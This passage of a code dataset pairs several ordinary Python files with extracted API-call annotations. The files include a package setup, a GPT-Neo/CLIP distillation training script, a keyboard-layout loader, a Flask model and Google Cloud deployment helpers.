code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from setuptools import setup
setup(name='pyunlvrtm',
version='0.2.4',
description='Python packages to faciliate the UNL-VRTM model',
url='https://github.com/xxu2/pyunlvrtm',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
packages=['pyunlvrtm'],
test_suite='nose.collector',
tests_require=['nose'],
zip_safe=False)
| [
"setuptools.setup"
] | [((30, 343), 'setuptools.setup', 'setup', ([], {'name': '"""pyunlvrtm"""', 'version': '"""0.2.4"""', 'description': '"""Python packages to faciliate the UNL-VRTM model"""', 'url': '"""https://github.com/xxu2/pyunlvrtm"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['pyunlvrtm']", 'test_suite': '"""nose.collector"""', 'tests_require': "['nose']", 'zip_safe': '(False)'}), "(name='pyunlvrtm', version='0.2.4', description=\n 'Python packages to faciliate the UNL-VRTM model', url=\n 'https://github.com/xxu2/pyunlvrtm', author='<NAME>', author_email=\n '<EMAIL>', license='MIT', packages=['pyunlvrtm'], test_suite=\n 'nose.collector', tests_require=['nose'], zip_safe=False)\n", (35, 343), False, 'from setuptools import setup\n')] |
from transformers import GPTNeoModel, GPTNeoForCausalLM,\
GPT2Tokenizer, GPTNeoConfig, AdamW
from torch.utils.data import IterableDataset, DataLoader
from lm_dataformat import *
import torch
import torch.nn.functional as F
from torch.nn.functional import normalize, cross_entropy
from torch.nn import DataParallel
from auto_tqdm import tqdm
from get_args import get_args
import deepspeed
args = get_args()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#create model, set neo_hidden
conf = GPTNeoConfig.from_pretrained("EleutherAI/gpt-neo-1.3B")
conf.gradient_checkpointing = True
model = GPTNeoForCausalLM.from_pretrained("EleutherAI/gpt-neo-1.3B", config=conf)
model.training = True
tokenizer = GPT2Tokenizer.from_pretrained("EleutherAI/gpt-neo-1.3B")
neo_hidden = model.config.hidden_size
#resize token embeddings. Two extra tokens
model.resize_token_embeddings(len(tokenizer)+2)
#Set up deep speed
model_engine, optimizer, _, _ = deepspeed.initialize(args=args,
model=model,
model_parameters=model.parameters())
model_engine.to(model_engine.local_rank)
#Initialize a random projection matrix
clip_hidden = 512
projection = torch.nn.Linear(neo_hidden, clip_hidden, bias=False).to(model_engine.local_rank)
#hparams
temperature = 1.0
learning_rate = 5e-5
weight_decay = 0
grad_accum = 2
clip_bs = 48
lambda_coeff = 1.0 #relative scale for contrastive loss
temp_tensor = torch.tensor(temperature).to(model_engine.local_rank)
#pytorch dataset for clip juicing
class DistillDataset(IterableDataset):
def __init__(self,\
tokenizer, clip_batch_size,
clip_dataset_dir, pile_dataset_dir,
special_token = "<|CLIP|>", steps = 1e6):
self.clip_dataset_dir = clip_dataset_dir
self.pile_dataset_dir = pile_dataset_dir
self.clip_rdr = Reader(self.clip_dataset_dir).stream_data(get_meta=True)
self.pile_rdr = Reader(self.pile_dataset_dir).stream_data(get_meta=True)
#Steps is the total number of elements we should use. Half from CLIP, half from AR
self.steps = steps
#How many elements are in a single contrastive clip batch
self.clip_batch_size = clip_batch_size
#Start on an example of WIT.
self.cur_clip = True
#Store special token, add to tokenizer. Remember to resize token embeddings on model!
self.tokenizer = tokenizer
self.special_token=special_token
#Get the index for the special token so that we can adjust the decode mask accordingly.
self.special_token_idx=len(self.tokenizer)
self.tokenizer.add_tokens([special_token])
self.tokenizer.add_special_tokens({'pad_token': '[PAD]'})
def __len__(self):
return int(self.steps)
def __iter__(self):
return self
def __next__(self):
tok = self.tokenizer
txts = list()
img_latents = list()
#Return an element from the pile
if not self.cur_clip:
text, _ =next(self.pile_rdr)
txts.append(text)
#Place holder
#Tokenize text
toks = tok.batch_encode_plus(txts, max_length=512, truncation=True, padding="max_length", return_tensors="pt").to(model_engine.local_rank)
img_latents.append([[0]*clip_hidden])
#Return an element from CLIP
else:
txts = list()
for _ in range(self.clip_batch_size):
text, img_latent=next(self.clip_rdr)
#Append special token
text += "<|CLIP|>"
txts.append(text)
img_latents.append([img_latent])
#Tokenize text
toks = tok.batch_encode_plus(txts, max_length=128, truncation=True, padding="max_length", return_tensors="pt").to(model_engine.local_rank)
#Get the index of the clip tokens.
clip_idx = (torch.sum(toks.attention_mask, dim=-1).to("cpu") - torch.tensor([1] * len(txts)))
#Get latent vectors
latents = torch.cat([torch.tensor(x) for x in img_latents], dim=0).to(model_engine.local_rank)
cc = self.cur_clip
#Flip cur clip
self.cur_clip = not self.cur_clip
return {
**toks,
'latent_vecs' : latents,
'clip_idx' : clip_idx,
'use_distill' : cc,
}
#Contrastive loss helper function
def clip_loss(a, b, temp):
# a ~ (b x d)
# b ~ (b x d)
batch_size, dimension = a.shape
a_normd = normalize(a, p=2, dim=1).squeeze().to(torch.float32)
b_normd = normalize(b, p=2, dim=1).squeeze().to(torch.float32)
logits = torch.einsum('i d, j d -> i j', a_normd, b_normd) * temp.exp()
labels = torch.arange(batch_size).to(model_engine.local_rank)
loss = cross_entropy(logits, labels) + cross_entropy(logits.T, labels)
return loss / 2.0
def ar_loss(out_embeds, inp):
# inp :: [b, seq]
logprobs = F.log_softmax(out_embeds['logits'].squeeze(0), dim=-1).to(torch.float32)
# logprobs :: [b, seq, vocab]
pred = logprobs[:, :-1]
tgt = inp.squeeze(0)[:, 1:]
is_clip_or_padding_token = tgt >= 50257
logits = torch.gather(pred, 2, tgt.unsqueeze(-1)).squeeze(-1) # [batch, seq-1]
# remove loss of clip-token
logits *= 1 - is_clip_or_padding_token.to(torch.int)
return -logits.sum()
#Load dataset
data = DistillDataset(tokenizer = tokenizer, clip_batch_size = clip_bs,\
clip_dataset_dir = "../../clip/",\
pile_dataset_dir = "../../val.jsonl.zst")
loader = DataLoader(dataset=data, batch_size=1)
#Check to see if a checkpoint exists. if it does, load that. Otherwise assume we are on step zero.
try:
_, client_sd = model_engine.load_checkpoint(args.load_dir, args.ckpt_id)
step = client_sd['step']
loader_to_step(loader, step+1)
except:
step = 0
#Set up progress bar
pbar = tqdm(enumerate(loader), total=len(data))
loss_progress = 0.0
loss_step_count = 0
#Update the pbar description every 20 batches
report_loss_every = 20
#save every 10000 batches
save_every = 10000
for batch, data_elem in pbar:
torch.cuda.empty_cache()
model_input = {
'input_ids':data_elem['input_ids'],
'attention_mask':data_elem['attention_mask'],
}
loss = None
# compute model once for both CLIP and AR
model_out = model_engine(**model_input, return_dict=True, output_hidden_states=True)
out_embeds = model_out['hidden_states']
#print("Layers:\n\n")
#print(out_embeds[-1])
#print("Logits:\n\n")
#print(model_out['logits'])
# debug shapes
#print([(k, v.shape if isinstance(v, torch.Tensor) else v) for k, v in data_elem.items()])
#If we are currently using contrastive loss
if data_elem['use_distill']:
#out_embeds ~ (b x seq_len x hidden_size)
idx = data_elem['clip_idx']
last_layer = out_embeds[-1].squeeze() # -1 for last layer
#Get predicted clip embedding. Grab from sequence_len dimension
clip_embeds = torch.zeros((data.clip_batch_size, neo_hidden)).to(model_engine.local_rank)
for i,j in enumerate(idx.tolist()[0]):
clip_embeds[i] = last_layer[i][j]
#Project to the correct size
clip_embeds = projection(clip_embeds)
#Compute contrastive loss
loss = lambda_coeff * clip_loss(clip_embeds, data_elem['latent_vecs'], temp_tensor)
else:
#compute AR loss if Pile data
n_text_toks = data_elem['clip_idx'].sum()
loss = ar_loss(model_out, data_elem['input_ids']) / n_text_toks
#loss = model_engine(batch)
print(loss)
if not torch.any(loss.isnan()):
model_engine.backward(loss.to(torch.float32))
model_engine.step()
loss_progress += loss.to(torch.float32).detach().cpu().item()
loss_step_count += 1
#Update loss progress
if (batch+1)%report_loss_every==0:
loss_progress /= float(loss_step_count)
pbar.set_description("Current loss: " + str(loss_progress))
loss_progress = 0.0
loss_step_count = 0
#Save model
if (batch+1)%save_every==0:
torch.distributed.barrier()
client_sd['step'] = step
ckpt_id = loss.item()
model_engine.save_checkpoint(args.save_dir, ckpt_id, client_sd=client_sd)
#model.save_pretrained("GPT-Neo-Enriched"+str(batch+1))
tokenizer.save_pretrained("GPT-Neo-Enriched"+str(batch+1))
model_engine.save_checkpoint(args.save_dir, ckpt_id, client_sd=client_sd)
#model.save_pretrained("GPT-Neo-Enriched")
tokenizer.save_pretrained("GPT-Neo-Enriched")
| [
"torch.distributed.barrier",
"transformers.GPT2Tokenizer.from_pretrained",
"get_args.get_args",
"torch.nn.functional.normalize",
"torch.tensor",
"transformers.GPTNeoConfig.from_pretrained",
"torch.cuda.is_available",
"torch.einsum",
"torch.nn.Linear",
"torch.utils.data.DataLoader",
"torch.nn.fun... | [((401, 411), 'get_args.get_args', 'get_args', ([], {}), '()\n', (409, 411), False, 'from get_args import get_args\n'), ((520, 575), 'transformers.GPTNeoConfig.from_pretrained', 'GPTNeoConfig.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {}), "('EleutherAI/gpt-neo-1.3B')\n", (548, 575), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((619, 692), 'transformers.GPTNeoForCausalLM.from_pretrained', 'GPTNeoForCausalLM.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {'config': 'conf'}), "('EleutherAI/gpt-neo-1.3B', config=conf)\n", (652, 692), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((727, 783), 'transformers.GPT2Tokenizer.from_pretrained', 'GPT2Tokenizer.from_pretrained', (['"""EleutherAI/gpt-neo-1.3B"""'], {}), "('EleutherAI/gpt-neo-1.3B')\n", (756, 783), False, 'from transformers import GPTNeoModel, GPTNeoForCausalLM, GPT2Tokenizer, GPTNeoConfig, AdamW\n'), ((5616, 5654), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'data', 'batch_size': '(1)'}), '(dataset=data, batch_size=1)\n', (5626, 5654), False, 'from torch.utils.data import IterableDataset, DataLoader\n'), ((6181, 6205), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (6203, 6205), False, 'import torch\n'), ((444, 469), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (467, 469), False, 'import torch\n'), ((1269, 1321), 'torch.nn.Linear', 'torch.nn.Linear', (['neo_hidden', 'clip_hidden'], {'bias': '(False)'}), '(neo_hidden, clip_hidden, bias=False)\n', (1284, 1321), False, 'import torch\n'), ((1516, 1541), 'torch.tensor', 'torch.tensor', (['temperature'], {}), '(temperature)\n', (1528, 1541), False, 'import torch\n'), ((4716, 4765), 'torch.einsum', 'torch.einsum', (['"""i d, j d -> i j"""', 'a_normd', 'b_normd'], {}), "('i d, j d -> i j', a_normd, b_normd)\n", (4728, 4765), False, 'import torch\n'), ((4858, 4887), 'torch.nn.functional.cross_entropy', 'cross_entropy', (['logits', 'labels'], {}), '(logits, labels)\n', (4871, 4887), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4890, 4921), 'torch.nn.functional.cross_entropy', 'cross_entropy', (['logits.T', 'labels'], {}), '(logits.T, labels)\n', (4903, 4921), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((8198, 8225), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', (8223, 8225), False, 'import torch\n'), ((4793, 4817), 'torch.arange', 'torch.arange', (['batch_size'], {}), '(batch_size)\n', (4805, 4817), False, 'import torch\n'), ((7083, 7130), 'torch.zeros', 'torch.zeros', (['(data.clip_batch_size, neo_hidden)'], {}), '((data.clip_batch_size, neo_hidden))\n', (7094, 7130), False, 'import torch\n'), ((3975, 4013), 'torch.sum', 'torch.sum', (['toks.attention_mask'], {'dim': '(-1)'}), '(toks.attention_mask, dim=-1)\n', (3984, 4013), False, 'import torch\n'), ((4583, 4607), 'torch.nn.functional.normalize', 'normalize', (['a'], {'p': '(2)', 'dim': '(1)'}), '(a, p=2, dim=1)\n', (4592, 4607), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4650, 4674), 'torch.nn.functional.normalize', 'normalize', (['b'], {'p': '(2)', 'dim': '(1)'}), '(b, p=2, dim=1)\n', (4659, 4674), False, 'from torch.nn.functional import normalize, cross_entropy\n'), ((4114, 4129), 'torch.tensor', 'torch.tensor', (['x'], {}), '(x)\n', (4126, 4129), False, 'import torch\n')] |
from enum import Enum
from importlib import resources
import sys
from typing import Dict
import yaml
current_module = sys.modules[__name__]
YAML_EXTENSION = '.yaml'
# the key names come from keyboardlayout.keyconstant
def __generate_keyboard_layout_enum():
layout_names = []
for file_name in resources.contents(current_module):
if file_name.endswith(YAML_EXTENSION):
layout_names.append(file_name[:-len(YAML_EXTENSION)])
layout_name_enum = Enum(
'LayoutName',
{layout_name.upper(): layout_name for layout_name in layout_names},
type=str
)
layout_name_enum.__doc__ = (
"An enum that holds the allowed layout names")
return layout_name_enum
LayoutName = __generate_keyboard_layout_enum()
def get_layout(layout_name: LayoutName) -> Dict:
if not isinstance(layout_name, LayoutName):
raise ValueError(
'Invalid input type, layout_name must be type LayoutName')
layout_file_name = layout_name.value + YAML_EXTENSION
stream = resources.read_text(current_module, layout_file_name)
layout = yaml.safe_load(stream)
return layout
class VerticalAnchor(Enum):
"""Enums used to set vertical text location"""
TOP = 't'
MIDDLE = 'm'
BOTTOM = 'b'
class HorizontalAnchor(Enum):
"""Enums used to set horizontal text location"""
LEFT = 'l'
CENTER = 'c'
RIGHT = 'r'
class LayoutConstant:
"""Constants used to acces data in keyboard layout yaml files"""
KEY_SIZE = 'key_size'
ROWS = 'rows'
NAME = 'name'
LOCATION = 'location'
SIZE = 'size'
TXT_INFO = 'txt_info'
KEYS = 'keys'
| [
"yaml.safe_load",
"importlib.resources.contents",
"importlib.resources.read_text"
] | [((303, 337), 'importlib.resources.contents', 'resources.contents', (['current_module'], {}), '(current_module)\n', (321, 337), False, 'from importlib import resources\n'), ((1034, 1087), 'importlib.resources.read_text', 'resources.read_text', (['current_module', 'layout_file_name'], {}), '(current_module, layout_file_name)\n', (1053, 1087), False, 'from importlib import resources\n'), ((1101, 1123), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (1115, 1123), False, 'import yaml\n')] |
from app import db, ma
class Participation(db.Model):
__tablename__ = 'participations'
id = db.Column(db.Integer, primary_key=True)
event_id = db.Column(db.Integer, nullable=True)
trucker_whatsapp = db.Column(db.String(120), nullable=True)
date = db.Column(db.Date, nullable=True)
def __init__(self, event_id, trucker_whatsapp, date):
self.event_id = event_id
self.trucker_whatsapp = trucker_whatsapp
self.date = date
def __repr_(self):
return f'<Participation : {self.event_id}, {self.trucker_whatsapp}, {self.date} >'
class ParticipationSchema(ma.Schema):
class Meta:
fields = ('id', 'event_id', 'trucker_whatsapp', 'date')
participation_share_schema = ParticipationSchema()
participations_share_schema = ParticipationSchema(many=True) | [
"app.db.String",
"app.db.Column"
] | [((102, 141), 'app.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (111, 141), False, 'from app import db, ma\n'), ((157, 193), 'app.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(True)'}), '(db.Integer, nullable=True)\n', (166, 193), False, 'from app import db, ma\n'), ((269, 302), 'app.db.Column', 'db.Column', (['db.Date'], {'nullable': '(True)'}), '(db.Date, nullable=True)\n', (278, 302), False, 'from app import db, ma\n'), ((227, 241), 'app.db.String', 'db.String', (['(120)'], {}), '(120)\n', (236, 241), False, 'from app import db, ma\n')] |
#!/usr/bin/env python
import sys,os
root = os.environ['NEMO_ROOT']
site = os.environ['NEMO_SITE']
sys.path.append(os.path.join(root,'scripts'))
from nemo import Makefile
mk = Makefile(
root = root,
sites = site,
flags = dict(PP_N_NODES = 4, PP_KERNEL_DGFV_QMAX = 2, PP_SPLIT_FORM = 0, PP_MESH_PERIODIC = 0),
)
sourcedir = root + '/source'
SETUPDIR = sourcedir + '/setups/euler/3d/self-gravity'
hydro = root + '/source/flux/euler/dgfv/3d'
#hydro = root + '/source/flux/euler/dgfv/3d/multilevel-lobatto'
#hydro = root + '/source/flux/euler/dgfv/3d/multilevel'
#hydro = root + '/source/flux/euler/dgfv/3d/singlelevel'
#hydro = root + '/source/flux/euler/dgfv/3d/singlelevel-multiflux'
kernel = root + '/source/kernel/dgfv/3d'
#timedisc = root + '/source/timedisc/rungekutta/5-4'
timedisc = root + '/source/timedisc/rungekutta/ssp/5-4'
equations = root + '/source/equations/euler/polytropic/3d'
riemann = equations + '/riemann/rusanov'
#riemann = equations + '/riemann/hllc'
#riemann = hydro + '/riemann/standard/roe'
#riemann = hydro + '/riemann/standard/roe-entropy-fix'
#riemann = hydro + '/riemann/standard/hlle+roe-entropy-fix'
#riemann = hydro + '/riemann/standard/hll'
#riemann = hydro + '/riemann/standard/hllc'
#riemann = hydro + '/riemann/standard/hllm'
#riemann = hydro + '/riemann/standard/entropy-stable'
#riemann = hydro + '/riemann/multidim/rusanov'
#riemann = hydro + '/riemann/multidim/chandrashekar'
#twopoint = hydro + '/equations/polytropic/two_point_flux/standard'
#twopoint = hydro + '/equations/polytropic/two_point_flux/kennedy-gruber'
#twopoint = hydro + '/equations/polytropic/two_point_flux/chandrashekar'
#twopoint = hydro + '/equations/polytropic/two_point_flux/schnuecke'
#mk.add(twopoint + '/two_point_flux_mod.f90')
mk.add(root + '/source/share_mod.f90')
mk.add(root + '/source/driver_mod.f90')
mk.add(root + '/source/runtime_mod.f90')
mk.add(root + '/source/common/*.f90')
mk.add(root + '/source/mesh/*.f90')
mk.add(root + '/source/mesh/bindings/*.f90')
mk.add(root + '/source/checkpoint/base/*.f90')
mk.add(root + '/source/checkpoint/hdf5/p4est/*.f90')
mk.add(riemann + '/*.f90')
mk.add(equations + '/*.f90')
mk.add(kernel,'*.f90')
mk.add(timedisc,'*.f90')
mk.add(SETUPDIR + '/modules/*_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_sensor_mod.f90')
# mk.add(SETUPDIR + '/modules/setup_amr_types_mod.f90')
mk.generate()
| [
"os.path.join"
] | [((117, 146), 'os.path.join', 'os.path.join', (['root', '"""scripts"""'], {}), "(root, 'scripts')\n", (129, 146), False, 'import sys, os\n')] |
"""Utility functions for the project deployment scripts."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import string
import subprocess
import sys
import tempfile
from absl import flags
import jsonschema
import ruamel.yaml
from deploy.utils import runner
FLAGS = flags.FLAGS
# Schema file for project configuration YAML files.
_PROJECT_CONFIG_SCHEMA = os.path.join(
os.path.dirname(__file__), '../project_config.yaml.schema')
# Retrieve all files matching the pattern and add them into import_files.
IMPORT_PATTERN_TAG = 'imports'
# Merge the files in import_files into the dict where it is declared.
IMPORT_FILES_TAG = 'import_files'
def normalize_path(path):
"""Normalizes paths specified through a local run or Bazel invocation."""
path = os.path.expandvars(os.path.expanduser(path))
if path.startswith('gs://') or os.path.isabs(path):
return path
# Path is relative from where the script was launched from.
# When using `bazel run`, the environment variable BUILD_WORKING_DIRECTORY
# will be set to the path where the command was run from.
cwd = os.environ.get('BUILD_WORKING_DIRECTORY', os.getcwd())
return os.path.abspath(os.path.join(cwd, path))
def wait_for_yes_no(text):
"""Prompt user for Yes/No and return true if Yes/Y. Default to No."""
if FLAGS.dry_run:
return True
while True:
# For compatibility with both Python 2 and 3.
if sys.version_info[0] < 3:
prompt = raw_input(text)
else:
prompt = input(text)
if not prompt or prompt[0] in 'nN':
# Default to No.
return False
if prompt[0] in 'yY':
return True
# Not Y or N, Keep trying.
def read_yaml_file(path):
"""Reads and parses a YAML file.
Args:
path (string): The path to the YAML file.
Returns:
A dict holding the parsed contents of the YAML file, or None if the file
could not be read or parsed.
"""
yaml = ruamel.yaml.YAML()
with open(path, 'r') as stream:
return yaml.load(stream)
def write_yaml_file(contents, path):
"""Saves a dictionary as a YAML file.
Args:
contents (dict): The contents to write to the YAML file.
path (string): The path to the YAML file.
"""
yaml = ruamel.yaml.YAML()
yaml.default_flow_style = False
yaml.Representer.ignore_aliases = lambda *args: True
if FLAGS.dry_run:
# If using dry_run mode, don't create the file, just print the contents.
print('Contents of {}:'.format(path))
print('===================================================================')
yaml.dump(contents, sys.stdout)
print('===================================================================')
return
with open(path, 'w') as outfile:
yaml.dump(contents, outfile)
def validate_config_yaml(config):
"""Validates a Project config YAML against the schema.
Args:
config (dict): The parsed contents of the project config YAML file.
Raises:
jsonschema.exceptions.ValidationError: if the YAML contents do not match the
schema.
"""
schema = read_yaml_file(_PROJECT_CONFIG_SCHEMA)
jsonschema.validate(config, schema)
def run_deployment(deployment_template, deployment_name, project_id):
"""Creates a new Deployment Manager deployment from a template.
Args:
deployment_template (dict): The dictionary representation of a deployment
manager YAML template.
deployment_name (string): The name for the deployment.
project_id (string): The project under which to create the deployment.
"""
# Save the deployment manager template to a temporary file in the same
# directory as the deployment manager templates.
dm_template_file = tempfile.NamedTemporaryFile(suffix='.yaml')
write_yaml_file(deployment_template, dm_template_file.name)
if deployment_exists(deployment_name, project_id):
gcloud_cmd = [
'deployment-manager',
'deployments',
'update',
deployment_name,
'--config',
dm_template_file.name,
'--delete-policy',
'ABANDON',
]
else:
gcloud_cmd = [
'deployment-manager',
'deployments',
'create',
deployment_name,
'--config',
dm_template_file.name,
'--automatic-rollback-on-error',
]
# Create the deployment.
runner.run_gcloud_command(gcloud_cmd, project_id=project_id)
# Check deployment exists (and wasn't automcatically rolled back)
runner.run_gcloud_command(
['deployment-manager', 'deployments', 'describe', deployment_name],
project_id=project_id)
def deployment_exists(deployment_name, project_id):
"""Determine whether the deployment exists.
Args:
deployment_name (string): name of deployment.
project_id: ID of project.
Returns:
bool: True if deployment exists in the projet.
"""
out = runner.run_gcloud_command(
['deployment-manager', 'deployments', 'list', '--format', 'json'],
project_id=project_id)
for info in json.loads(out):
if deployment_name == info['name']:
return True
return False
def create_notification_channel(alert_email, project_id):
"""Creates a new Stackdriver email notification channel.
Args:
alert_email (string): The email address to send alerts to.
project_id (string): The project under which to create the channel.
Returns:
A string, the name of the notification channel
Raises:
GcloudRuntimeError: when the channel cannot be created.
"""
# Create a config file for the new Email notification channel.
config_file = tempfile.NamedTemporaryFile(suffix='.yaml')
channel_config = {
'type': 'email',
'displayName': 'Email',
'labels': {
'email_address': alert_email
}
}
write_yaml_file(channel_config, config_file.name)
# Create the new channel and get its name.
channel_name = runner.run_gcloud_command(
['alpha', 'monitoring', 'channels', 'create',
'--channel-content-from-file', config_file.name,
'--format', 'value(name)'],
project_id=project_id).strip()
return channel_name
def create_alert_policy(
resource_types, metric_name, policy_name, description, channel, project_id):
"""Creates a new Stackdriver alert policy for a logs-based metric.
Args:
resource_types (list[str]): A list of resource types for the metric.
metric_name (string): The name of the logs-based metric.
policy_name (string): The name for the newly created alert policy.
description (string): A description of the alert policy.
channel (string): The Stackdriver notification channel to send alerts on.
project_id (string): The project under which to create the alert.
Raises:
GcloudRuntimeError: when command execution returns a non-zero return code.
"""
# Create a config file for the new alert policy.
config_file = tempfile.NamedTemporaryFile(suffix='.yaml')
resource_type_str = ''
if len(resource_types) > 1:
index = 0
resource_type_str = 'one_of(\"'+resource_types[index]+'\"'
while index < len(resource_types) - 1:
index += 1
resource_type_str += ',\"'+resource_types[index]+'\"'
resource_type_str = resource_type_str + ')'
else:
resource_type_str = '\"' + resource_types[0] + '\"'
alert_filter = ('resource.type={} AND '
'metric.type="logging.googleapis.com/user/{}"').format(
resource_type_str, metric_name)
condition_threshold = {
'comparison': 'COMPARISON_GT',
'thresholdValue': 0,
'filter': alert_filter,
'duration': '0s'
}
conditions = [{'conditionThreshold': condition_threshold,
'displayName': 'No tolerance on {}!'.format(
metric_name)}]
# Send an alert if the metric goes above zero.
alert_config = {
'displayName': policy_name,
'documentation': {
'content': description,
'mimeType': 'text/markdown',
},
'conditions': conditions,
'combiner': 'AND',
'enabled': True,
'notificationChannels': [channel],
}
write_yaml_file(alert_config, config_file.name)
# Create the new alert policy.
runner.run_gcloud_command(
['alpha', 'monitoring', 'policies', 'create',
'--policy-from-file', config_file.name],
project_id=project_id)
def get_gcloud_user():
"""Returns the active authenticated gcloud account."""
return runner.run_gcloud_command(
['config', 'list', 'account', '--format', 'value(core.account)'],
project_id=None).strip()
def get_project_number(project_id):
"""Returns the project number the given project."""
return runner.run_gcloud_command(
['projects', 'describe', project_id,
'--format', 'value(projectNumber)'],
project_id=None).strip()
def get_deployment_manager_service_account(project_id):
"""Returns the deployment manager service account for the given project."""
return 'serviceAccount:{}<EMAIL>'.format(
get_project_number(project_id))
def get_log_sink_service_account(log_sink_name, project_id):
"""Gets the service account name for the given log sink."""
sink_service_account = runner.run_gcloud_command([
'logging', 'sinks', 'describe', log_sink_name,
'--format', 'value(writerIdentity)'], project_id).strip()
# The name returned has a 'serviceAccount:' prefix, so remove this.
return sink_service_account.split(':')[1]
def get_gce_instance_info(project_id):
"""Gets a list of GCE instance info for each instance."""
output = runner.run_gcloud_command(
['compute', 'instances', 'list', '--format', 'value(name,id)'],
project_id=project_id)
if not output:
return []
instance_info = []
for line in output.split('\n'):
name, instance_id = line.split()
instance_info.append({'name': name, 'id': instance_id})
return instance_info
def resolve_env_vars(config):
"""Recursively resolves (in place) environment variables in config strings.
Args:
config: dictionary or list from a parsed YAML file.
"""
keys = []
if isinstance(config, dict):
keys = config.keys()
elif isinstance(config, list):
keys = range(len(config))
else:
return
for k in keys:
# Only do substitutions on strings.
v = config[k]
if isinstance(v, str):
config[k] = string.Template(v).safe_substitute(os.environ)
else:
# Recursively handle lists and dictionaries.
resolve_env_vars(v)
def merge_dicts(dst, src):
"""Merge src into dst.
Args:
dst: Dictionary for all configs.
src: Dictionary to be merged.
Raises:
TypeError: If two dictionaries have the same key and different value types.
"""
for key, val in src.items():
if key in dst:
root_value = dst[key]
if isinstance(val, list) and isinstance(root_value, list):
root_value.extend(val)
elif isinstance(val, dict) and isinstance(root_value, dict):
merge_dicts(root_value, val)
else:
raise TypeError('Conflict key %s in config files.' % key)
else:
dst[key] = val
def get_import_files(overall, overall_path):
"""Get all imported file normalized paths.
Args:
overall: dictionary or list from a parsed YAML file.
overall_path: The path of the overall YAML file.
Returns:
A list holding all the imported file normalized paths.
"""
import_list = overall.get(IMPORT_FILES_TAG, [])
import_files = set()
for file_path in import_list:
import_files.add(
os.path.normpath(
os.path.join(os.path.dirname(overall_path), file_path)))
ret_list = list(
import_files.union(set(expand_imports(overall, overall_path))))
ret_list.sort()
return ret_list
def expand_imports(overall, overall_path):
"""Find all to be imported files to extend import_files.
Args:
overall: dictionary or list from a parsed YAML file.
overall_path: The path of the overall YAML file.
Returns:
A list holding all the imported file paths.
"""
imports_patterns = overall.get(IMPORT_PATTERN_TAG, [])
all_files = set()
for pattern in imports_patterns:
absolute_pattern = os.path.normpath(
os.path.join(os.path.dirname(overall_path), pattern))
for path in glob.glob(absolute_pattern):
if path != overall_path:
all_files.add(path)
return all_files
def load_config(overall_path):
"""Reads and parses a YAML file.
Args:
overall_path (string): The path to the YAML file.
Returns:
A dict holding the parsed contents of the YAML file, or None if the file
could not be read or parsed.
"""
overall = read_yaml_file(overall_path)
if not overall:
return None
import_files = get_import_files(overall, overall_path)
for inc_file in import_files:
inc_contents = read_yaml_file(inc_file)
merge_dicts(overall, inc_contents)
resolve_env_vars(overall)
return overall
def call_go_binary(parameter_list):
"""Call Golang binary."""
if FLAGS.dry_run:
return
if FLAGS.enable_new_style_resources:
subprocess.check_call(parameter_list)
class InvalidConfigError(Exception):
"""The exception when the config file is invalid."""
pass
| [
"json.loads",
"string.Template",
"os.path.isabs",
"subprocess.check_call",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"jsonschema.validate",
"glob.glob",
"tempfile.NamedTemporaryFile",
"deploy.utils.runner.run_gcloud_command",
"os.path.expanduser"
] | [((476, 501), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (491, 501), False, 'import os\n'), ((3158, 3193), 'jsonschema.validate', 'jsonschema.validate', (['config', 'schema'], {}), '(config, schema)\n', (3177, 3193), False, 'import jsonschema\n'), ((3733, 3776), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (3760, 3776), False, 'import tempfile\n'), ((4362, 4422), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (['gcloud_cmd'], {'project_id': 'project_id'}), '(gcloud_cmd, project_id=project_id)\n', (4387, 4422), False, 'from deploy.utils import runner\n'), ((4494, 4614), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['deployment-manager', 'deployments', 'describe', deployment_name]"], {'project_id': 'project_id'}), "(['deployment-manager', 'deployments', 'describe',\n deployment_name], project_id=project_id)\n", (4519, 4614), False, 'from deploy.utils import runner\n'), ((4891, 5010), 'deploy.utils.runner.run_gcloud_command', 'runner.run_gcloud_command', (["['deployment-manager', 'deployments', 'list', '--format', 'json']"], {'project_id': 'project_id'}), "(['deployment-manager', 'deployments', 'list',\n '--format', 'json'], project_id=project_id)\n", (4916, 5010), False, 'from deploy.utils import runner\n'), ((5035, 5050), 'json.loads', 'json.loads', (['out'], {}), '(out)\n', (5045, 5050), False, 'import json\n'), ((5607, 5650), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (5634, 5650), False, 'import tempfile\n'), ((6900, 6943), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".yaml"""'}), "(suffix='.yaml')\n", (6927, 6943), False, 'import tempfile\n'), 